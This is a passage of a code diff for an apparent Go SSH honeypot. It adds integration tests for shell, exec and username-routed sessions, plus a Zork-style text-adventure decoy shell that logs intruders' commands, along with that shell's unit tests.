|
|||||||
AcceptAfter: 2,
|
AcceptAfter: 2,
|
||||||
CredentialTTLDuration: time.Hour,
|
CredentialTTLDuration: time.Hour,
|
||||||
StaticCredentials: []config.Credential{
|
StaticCredentials: []config.Credential{
|
||||||
{Username: "root", Password: "toor"},
|
{Username: "root", Password: "toor", Shell: "bash"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
Shell: config.ShellConfig{
|
||||||
|
Hostname: "ubuntu-server",
|
||||||
|
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
|
||||||
|
},
|
||||||
LogLevel: "debug",
|
LogLevel: "debug",
|
||||||
}
|
}
|
||||||
|
|
||||||
logger := slog.New(slog.NewTextHandler(os.Stderr, &slog.HandlerOptions{Level: slog.LevelDebug}))
|
logger := slog.New(slog.NewTextHandler(os.Stderr, &slog.HandlerOptions{Level: slog.LevelDebug}))
|
||||||
store := storage.NewMemoryStore()
|
store := storage.NewMemoryStore()
|
||||||
srv, err := New(cfg, store, logger)
|
srv, err := New(cfg, store, logger, metrics.New("test"))
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("creating server: %v", err)
|
t.Fatalf("creating server: %v", err)
|
||||||
}
|
}
|
||||||
@@ -152,7 +160,7 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
|||||||
time.Sleep(50 * time.Millisecond)
|
time.Sleep(50 * time.Millisecond)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Test static credential login.
|
// Test static credential login with shell interaction.
|
||||||
t.Run("static_cred", func(t *testing.T) {
|
t.Run("static_cred", func(t *testing.T) {
|
||||||
clientCfg := &ssh.ClientConfig{
|
clientCfg := &ssh.ClientConfig{
|
||||||
User: "root",
|
User: "root",
|
||||||
@@ -172,6 +180,62 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
|||||||
t.Fatalf("new session: %v", err)
|
t.Fatalf("new session: %v", err)
|
||||||
}
|
}
|
||||||
defer session.Close()
|
defer session.Close()
|
||||||
|
|
||||||
|
// Request PTY and shell.
|
||||||
|
if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
|
||||||
|
t.Fatalf("request pty: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
stdin, err := session.StdinPipe()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("stdin pipe: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var output bytes.Buffer
|
||||||
|
session.Stdout = &output
|
||||||
|
|
||||||
|
if err := session.Shell(); err != nil {
|
||||||
|
t.Fatalf("shell: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait for the prompt, then send commands.
|
||||||
|
time.Sleep(500 * time.Millisecond)
|
||||||
|
stdin.Write([]byte("pwd\r"))
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
stdin.Write([]byte("whoami\r"))
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
stdin.Write([]byte("exit\r"))
|
||||||
|
|
||||||
|
// Wait for session to end.
|
||||||
|
session.Wait()
|
||||||
|
|
||||||
|
out := output.String()
|
||||||
|
if !strings.Contains(out, "Welcome to Ubuntu") {
|
||||||
|
t.Errorf("output should contain banner, got: %s", out)
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "/root") {
|
||||||
|
t.Errorf("output should contain /root from pwd, got: %s", out)
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "root") {
|
||||||
|
t.Errorf("output should contain 'root' from whoami, got: %s", out)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify session logs were recorded.
|
||||||
|
if len(store.SessionLogs) < 2 {
|
||||||
|
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify session was created with shell name.
|
||||||
|
var foundBash bool
|
||||||
|
for _, s := range store.Sessions {
|
||||||
|
if s.ShellName == "bash" {
|
||||||
|
foundBash = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !foundBash {
|
||||||
|
t.Error("expected a session with shell_name='bash'")
|
||||||
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
// Test wrong password is rejected.
|
// Test wrong password is rejected.
|
||||||
@@ -189,6 +253,137 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
|||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
|
// Test exec command capture.
|
||||||
|
t.Run("exec_command", func(t *testing.T) {
|
||||||
|
clientCfg := &ssh.ClientConfig{
|
||||||
|
User: "root",
|
||||||
|
Auth: []ssh.AuthMethod{ssh.Password("toor")},
|
||||||
|
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
|
||||||
|
Timeout: 5 * time.Second,
|
||||||
|
}
|
||||||
|
|
||||||
|
client, err := ssh.Dial("tcp", addr, clientCfg)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("SSH dial: %v", err)
|
||||||
|
}
|
||||||
|
defer client.Close()
|
||||||
|
|
||||||
|
session, err := client.NewSession()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("new session: %v", err)
|
||||||
|
}
|
||||||
|
defer session.Close()
|
||||||
|
|
||||||
|
// Run a command via exec (no PTY, no shell).
|
||||||
|
if err := session.Run("uname -a"); err != nil {
|
||||||
|
// Run returns an error because the server closes the channel,
|
||||||
|
// but that's expected.
|
||||||
|
_ = err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Give the server a moment to store the command.
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
|
||||||
|
// Verify the exec command was captured.
|
||||||
|
sessions, err := store.GetRecentSessions(context.Background(), 50, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
var foundExec bool
|
||||||
|
for _, s := range sessions {
|
||||||
|
if s.ExecCommand != nil && *s.ExecCommand == "uname -a" {
|
||||||
|
foundExec = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !foundExec {
|
||||||
|
t.Error("expected a session with exec_command='uname -a'")
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
// Test username route: add username_routes so that "postgres" gets psql shell.
|
||||||
|
t.Run("username_route", func(t *testing.T) {
|
||||||
|
// Reconfigure with username routes.
|
||||||
|
srv.cfg.Shell.UsernameRoutes = map[string]string{"postgres": "psql"}
|
||||||
|
defer func() { srv.cfg.Shell.UsernameRoutes = nil }()
|
||||||
|
|
||||||
|
// Need to get the "postgres" user in via static creds or threshold.
|
||||||
|
// Use static creds for simplicity.
|
||||||
|
srv.cfg.Auth.StaticCredentials = append(srv.cfg.Auth.StaticCredentials,
|
||||||
|
config.Credential{Username: "postgres", Password: "postgres"},
|
||||||
|
)
|
||||||
|
srv.authenticator = auth.NewAuthenticator(srv.cfg.Auth)
|
||||||
|
defer func() {
|
||||||
|
srv.cfg.Auth.StaticCredentials = srv.cfg.Auth.StaticCredentials[:1]
|
||||||
|
srv.authenticator = auth.NewAuthenticator(srv.cfg.Auth)
|
||||||
|
}()
|
||||||
|
|
||||||
|
clientCfg := &ssh.ClientConfig{
|
||||||
|
User: "postgres",
|
||||||
|
Auth: []ssh.AuthMethod{ssh.Password("postgres")},
|
||||||
|
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
|
||||||
|
Timeout: 5 * time.Second,
|
||||||
|
}
|
||||||
|
|
||||||
|
client, err := ssh.Dial("tcp", addr, clientCfg)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("SSH dial: %v", err)
|
||||||
|
}
|
||||||
|
defer client.Close()
|
||||||
|
|
||||||
|
session, err := client.NewSession()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("new session: %v", err)
|
||||||
|
}
|
||||||
|
defer session.Close()
|
||||||
|
|
||||||
|
if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
|
||||||
|
t.Fatalf("request pty: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
stdin, err := session.StdinPipe()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("stdin pipe: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var output bytes.Buffer
|
||||||
|
session.Stdout = &output
|
||||||
|
|
||||||
|
if err := session.Shell(); err != nil {
|
||||||
|
t.Fatalf("shell: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait for the psql banner.
|
||||||
|
time.Sleep(500 * time.Millisecond)
|
||||||
|
|
||||||
|
// Send \q to quit.
|
||||||
|
stdin.Write([]byte(`\q` + "\r"))
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
|
||||||
|
session.Wait()
|
||||||
|
|
||||||
|
out := output.String()
|
||||||
|
if !strings.Contains(out, "psql") {
|
||||||
|
t.Errorf("output should contain psql banner, got: %s", out)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify session was created with shell name "psql".
|
||||||
|
sessions, err := store.GetRecentSessions(context.Background(), 50, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
var foundPsql bool
|
||||||
|
for _, s := range sessions {
|
||||||
|
if s.ShellName == "psql" && s.Username == "postgres" {
|
||||||
|
foundPsql = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !foundPsql {
|
||||||
|
t.Error("expected a session with shell_name='psql' for user 'postgres'")
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
// Test threshold acceptance: after enough failed dials, a subsequent
|
// Test threshold acceptance: after enough failed dials, a subsequent
|
||||||
// dial with the same credentials should succeed via threshold or
|
// dial with the same credentials should succeed via threshold or
|
||||||
// remembered credential.
|
// remembered credential.
|
||||||
|
|||||||
117
internal/shell/adventure/adventure.go
Normal file
117
internal/shell/adventure/adventure.go
Normal file
@@ -0,0 +1,117 @@
|
|||||||
|
package adventure
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 10 * time.Minute
|
||||||
|
|
||||||
|
// AdventureShell implements a Zork-style text adventure set in a dungeon/data center.
|
||||||
|
type AdventureShell struct{}
|
||||||
|
|
||||||
|
// NewAdventureShell returns a new AdventureShell instance.
|
||||||
|
func NewAdventureShell() *AdventureShell {
|
||||||
|
return &AdventureShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (a *AdventureShell) Name() string { return "adventure" }
|
||||||
|
func (a *AdventureShell) Description() string { return "Zork-style text adventure dungeon crawler" }
|
||||||
|
|
||||||
|
func (a *AdventureShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
dungeonName := configString(sess.ShellConfig, "dungeon_name", "THE OUBLIETTE")
|
||||||
|
game := newGame()
|
||||||
|
|
||||||
|
// Print banner and initial room.
|
||||||
|
banner := strings.ReplaceAll(adventureBanner(dungeonName), "\n", "\r\n")
|
||||||
|
fmt.Fprint(rw, banner)
|
||||||
|
|
||||||
|
// Show starting room.
|
||||||
|
startDesc := game.describeRoom(game.rooms[game.currentRoom])
|
||||||
|
startDesc = strings.ReplaceAll(startDesc, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n\r\n", startDesc)
|
||||||
|
|
||||||
|
for {
|
||||||
|
if _, err := fmt.Fprint(rw, "> "); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
fmt.Fprint(rw, "\r\n")
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
if trimmed == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
result := game.dispatch(trimmed)
|
||||||
|
|
||||||
|
var output string
|
||||||
|
if result.output != "" {
|
||||||
|
output = result.output
|
||||||
|
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||||
|
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Log command and output to store.
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("adventure")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func adventureBanner(dungeonName string) string {
|
||||||
|
return fmt.Sprintf(`
|
||||||
|
___ _ _ ____ _ ___ _____ _____ _____
|
||||||
|
/ _ \| | | | __ )| | |_ _| ____|_ _|_ _| ___
|
||||||
|
| | | | | | | _ \| | | || _| | | | | / _ \
|
||||||
|
| |_| | |_| | |_) | |___ | || |___ | | | | | __/
|
||||||
|
\___/ \___/|____/|_____|___|_____| |_| |_| \___|
|
||||||
|
|
||||||
|
Welcome to %s.
|
||||||
|
|
||||||
|
You wake up in the dark. The air is cold and hums with electricity.
|
||||||
|
This is a place where things are put to be forgotten.
|
||||||
|
|
||||||
|
Type 'help' for commands. Type 'look' to examine your surroundings.
|
||||||
|
|
||||||
|
`, dungeonName)
|
||||||
|
}
|
||||||
|
|
||||||
|
// configString reads a string from the shell config map with a default.
|
||||||
|
func configString(cfg map[string]any, key, defaultVal string) string {
|
||||||
|
if cfg == nil {
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
|
if v, ok := cfg[key]; ok {
|
||||||
|
if s, ok := v.(string); ok && s != "" {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
383
internal/shell/adventure/adventure_test.go
Normal file
383
internal/shell/adventure/adventure_test.go
Normal file
@@ -0,0 +1,383 @@
|
|||||||
|
package adventure
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
type rwCloser struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *rwCloser) Close() error { return nil }
|
||||||
|
|
||||||
|
func runShell(t *testing.T, commands string) string {
|
||||||
|
t.Helper()
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "adventure", "")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "root",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: bytes.NewBufferString(commands),
|
||||||
|
Writer: &bytes.Buffer{},
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewAdventureShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
if err := sh.Handle(ctx, sess, rw); err != nil {
|
||||||
|
t.Fatalf("Handle: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return rw.Writer.(*bytes.Buffer).String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAdventureShellName(t *testing.T) {
|
||||||
|
sh := NewAdventureShell()
|
||||||
|
if sh.Name() != "adventure" {
|
||||||
|
t.Errorf("Name() = %q, want %q", sh.Name(), "adventure")
|
||||||
|
}
|
||||||
|
if sh.Description() == "" {
|
||||||
|
t.Error("Description() should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBanner(t *testing.T) {
|
||||||
|
output := runShell(t, "quit\r")
|
||||||
|
if !strings.Contains(output, "OUBLIETTE") {
|
||||||
|
t.Error("output should contain OUBLIETTE in banner")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, ">") {
|
||||||
|
t.Error("output should contain > prompt")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestStartingRoom(t *testing.T) {
|
||||||
|
output := runShell(t, "quit\r")
|
||||||
|
if !strings.Contains(output, "The Oubliette") {
|
||||||
|
t.Error("should start in The Oubliette")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "narrow stone chamber") {
|
||||||
|
t.Error("should show starting room description")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHelpCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "help\rquit\r")
|
||||||
|
for _, keyword := range []string{"look", "go", "take", "drop", "use", "inventory", "help", "quit"} {
|
||||||
|
if !strings.Contains(output, keyword) {
|
||||||
|
t.Errorf("help output should mention %q", keyword)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLookCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "look\rquit\r")
|
||||||
|
if !strings.Contains(output, "The Oubliette") {
|
||||||
|
t.Error("look should show current room")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Exits:") {
|
||||||
|
t.Error("look should show exits")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMovement(t *testing.T) {
|
||||||
|
output := runShell(t, "go east\rquit\r")
|
||||||
|
if !strings.Contains(output, "Stone Corridor") {
|
||||||
|
t.Error("going east from oubliette should reach Stone Corridor")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBareDirection(t *testing.T) {
|
||||||
|
output := runShell(t, "e\rquit\r")
|
||||||
|
if !strings.Contains(output, "Stone Corridor") {
|
||||||
|
t.Error("bare 'e' should move east to Stone Corridor")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDirectionAliases(t *testing.T) {
|
||||||
|
output := runShell(t, "east\rquit\r")
|
||||||
|
if !strings.Contains(output, "Stone Corridor") {
|
||||||
|
t.Error("'east' should move to Stone Corridor")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInvalidDirection(t *testing.T) {
|
||||||
|
output := runShell(t, "go north\rquit\r")
|
||||||
|
if !strings.Contains(output, "can't go") {
|
||||||
|
t.Error("should say you can't go that direction")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTakeItem(t *testing.T) {
|
||||||
|
// Move to corridor where flashlight is.
|
||||||
|
output := runShell(t, "e\rtake flashlight\rinventory\rquit\r")
|
||||||
|
if !strings.Contains(output, "Taken") {
|
||||||
|
t.Error("should confirm taking item")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "flashlight") {
|
||||||
|
t.Error("inventory should show flashlight")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDropItem(t *testing.T) {
|
||||||
|
output := runShell(t, "e\rtake flashlight\rdrop flashlight\rinventory\rquit\r")
|
||||||
|
if !strings.Contains(output, "Dropped") {
|
||||||
|
t.Error("should confirm dropping item")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "not carrying anything") {
|
||||||
|
t.Error("inventory should be empty after dropping")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEmptyInventory(t *testing.T) {
|
||||||
|
output := runShell(t, "inventory\rquit\r")
|
||||||
|
if !strings.Contains(output, "not carrying anything") {
|
||||||
|
t.Error("should say not carrying anything")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestExamineItem(t *testing.T) {
|
||||||
|
output := runShell(t, "e\rexamine flashlight\rquit\r")
|
||||||
|
if !strings.Contains(output, "batteries") {
|
||||||
|
t.Error("examining flashlight should describe it")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDarkRoom(t *testing.T) {
|
||||||
|
// Go to the pit without flashlight.
|
||||||
|
output := runShell(t, "down\rquit\r")
|
||||||
|
if !strings.Contains(output, "darkness") {
|
||||||
|
t.Error("pit should be dark without flashlight")
|
||||||
|
}
|
||||||
|
// Should NOT show the lit description.
|
||||||
|
if strings.Contains(output, "skeleton") {
|
||||||
|
t.Error("should not see skeleton without flashlight")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDarkRoomWithFlashlight(t *testing.T) {
|
||||||
|
// Get flashlight first, then go to pit.
|
||||||
|
output := runShell(t, "e\rtake flashlight\rw\rdown\rquit\r")
|
||||||
|
if !strings.Contains(output, "skeleton") {
|
||||||
|
t.Error("should see skeleton with flashlight in pit")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "rusty key") {
|
||||||
|
t.Error("should see rusty key with flashlight in pit")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDarkRoomCantTake(t *testing.T) {
|
||||||
|
output := runShell(t, "down\rtake rusty_key\rquit\r")
|
||||||
|
if !strings.Contains(output, "too dark") {
|
||||||
|
t.Error("should not be able to take items in dark room")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLockedDoor(t *testing.T) {
|
||||||
|
// Navigate to archive without keycard.
|
||||||
|
output := runShell(t, "e\rs\rs\re\rquit\r")
|
||||||
|
if !strings.Contains(output, "keycard") || !strings.Contains(output, "red") {
|
||||||
|
t.Error("should mention keycard reader when trying locked door")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUnlockWithKeycard(t *testing.T) {
|
||||||
|
// Get keycard from server room, navigate to archive, use keycard.
|
||||||
|
output := runShell(t, "e\re\rtake keycard\rw\rs\rs\ruse keycard\re\rquit\r")
|
||||||
|
if !strings.Contains(output, "green") || !strings.Contains(output, "clicks open") {
|
||||||
|
t.Error("should show unlock message")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Control Room") {
|
||||||
|
t.Error("should be able to enter control room after unlocking")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRustyKeyPuzzle(t *testing.T) {
|
||||||
|
// Get flashlight, get rusty key from pit, go to generator room, use key.
|
||||||
|
output := runShell(t, "e\rtake flashlight\rw\rdown\rtake rusty_key\rup\re\re\rs\re\ruse rusty_key\rquit\r")
|
||||||
|
if !strings.Contains(output, "maintenance panel") || !strings.Contains(output, "logbook") {
|
||||||
|
t.Error("should show maintenance log when using rusty key in generator room")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "Dunwich") {
|
||||||
|
t.Error("logbook should mention Dunwich")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestExitEndsGame(t *testing.T) {
|
||||||
|
// Full path to exit: get keycard, navigate to archive, unlock, go to control room, east to exit.
|
||||||
|
output := runShell(t, "e\re\rtake keycard\rw\rs\rs\ruse keycard\re\re\r")
|
||||||
|
if !strings.Contains(output, "SECURITY AUDIT") {
|
||||||
|
t.Error("exit should show the ending message")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "SESSION HAS BEEN LOGGED") {
|
||||||
|
t.Error("exit should mention session logging")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUnknownCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "xyzzy\rquit\r")
|
||||||
|
if !strings.Contains(output, "don't understand") {
|
||||||
|
t.Error("should show error for unknown command")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestQuitCommand(t *testing.T) {
|
||||||
|
output := runShell(t, "quit\r")
|
||||||
|
if !strings.Contains(output, "terminated") {
|
||||||
|
t.Error("quit should show termination message")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestExitAlias(t *testing.T) {
|
||||||
|
output := runShell(t, "exit\r")
|
||||||
|
if !strings.Contains(output, "terminated") {
|
||||||
|
t.Error("exit alias should work like quit")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestVentilationShaft(t *testing.T) {
|
||||||
|
output := runShell(t, "e\rup\rquit\r")
|
||||||
|
if !strings.Contains(output, "Ventilation Shaft") {
|
||||||
|
t.Error("should reach ventilation shaft from corridor")
|
||||||
|
}
|
||||||
|
if !strings.Contains(output, "note") {
|
||||||
|
t.Error("should see note in ventilation shaft")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNote(t *testing.T) {
|
||||||
|
output := runShell(t, "e\rup\rtake note\rexamine note\rquit\r")
|
||||||
|
if !strings.Contains(output, "GET OUT") {
|
||||||
|
t.Error("note should contain warning text")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUseItemWrongRoom(t *testing.T) {
|
||||||
|
// Get keycard from server room, try to use in wrong room.
|
||||||
|
output := runShell(t, "e\re\rtake keycard\ruse keycard\rquit\r")
|
||||||
|
if !strings.Contains(output, "nothing to use") {
|
||||||
|
t.Error("should say nothing to use keycard on in wrong room")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEthernetCable(t *testing.T) {
|
||||||
|
output := runShell(t, "e\rs\rtake ethernet_cable\ruse ethernet_cable\rquit\r")
|
||||||
|
if !strings.Contains(output, "chewed") {
|
||||||
|
t.Error("using ethernet cable should mention chewed ends")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSessionLogs(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "adventure", "")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "root",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: bytes.NewBufferString("help\rquit\r"),
|
||||||
|
Writer: &bytes.Buffer{},
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewAdventureShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
sh.Handle(ctx, sess, rw)
|
||||||
|
|
||||||
|
if len(store.SessionLogs) < 2 {
|
||||||
|
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestParserBasics(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
input string
|
||||||
|
verb string
|
||||||
|
object string
|
||||||
|
}{
|
||||||
|
{"look", "look", ""},
|
||||||
|
{"l", "look", ""},
|
||||||
|
{"examine flashlight", "look", "flashlight"},
|
||||||
|
{"go north", "go", "north"},
|
||||||
|
{"n", "go", "north"},
|
||||||
|
{"south", "go", "south"},
|
||||||
|
{"take the key", "take", "key"},
|
||||||
|
{"get a flashlight", "take", "flashlight"},
|
||||||
|
{"drop rusty key", "drop", "rusty key"},
|
||||||
|
{"use keycard", "use", "keycard"},
|
||||||
|
{"inventory", "inventory", ""},
|
||||||
|
{"i", "inventory", ""},
|
||||||
|
{"inv", "inventory", ""},
|
||||||
|
{"help", "help", ""},
|
||||||
|
{"?", "help", ""},
|
||||||
|
{"quit", "quit", ""},
|
||||||
|
{"exit", "quit", ""},
|
||||||
|
{"q", "quit", ""},
|
||||||
|
{"LOOK", "look", ""},
|
||||||
|
{" go east ", "go", "east"},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.input, func(t *testing.T) {
|
||||||
|
cmd := parseCommand(tt.input)
|
||||||
|
if cmd.verb != tt.verb {
|
||||||
|
t.Errorf("parseCommand(%q).verb = %q, want %q", tt.input, cmd.verb, tt.verb)
|
||||||
|
}
|
||||||
|
if cmd.object != tt.object {
|
||||||
|
t.Errorf("parseCommand(%q).object = %q, want %q", tt.input, cmd.object, tt.object)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestParserEmpty(t *testing.T) {
|
||||||
|
cmd := parseCommand("")
|
||||||
|
if cmd.verb != "" {
|
||||||
|
t.Errorf("empty input should give empty verb, got %q", cmd.verb)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestParserArticleStripping(t *testing.T) {
|
||||||
|
cmd := parseCommand("take the an a flashlight")
|
||||||
|
if cmd.verb != "take" || cmd.object != "flashlight" {
|
||||||
|
t.Errorf("articles should be stripped, got verb=%q object=%q", cmd.verb, cmd.object)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestConfigString(t *testing.T) {
|
||||||
|
cfg := map[string]any{"dungeon_name": "MY DUNGEON"}
|
||||||
|
if got := configString(cfg, "dungeon_name", "DEFAULT"); got != "MY DUNGEON" {
|
||||||
|
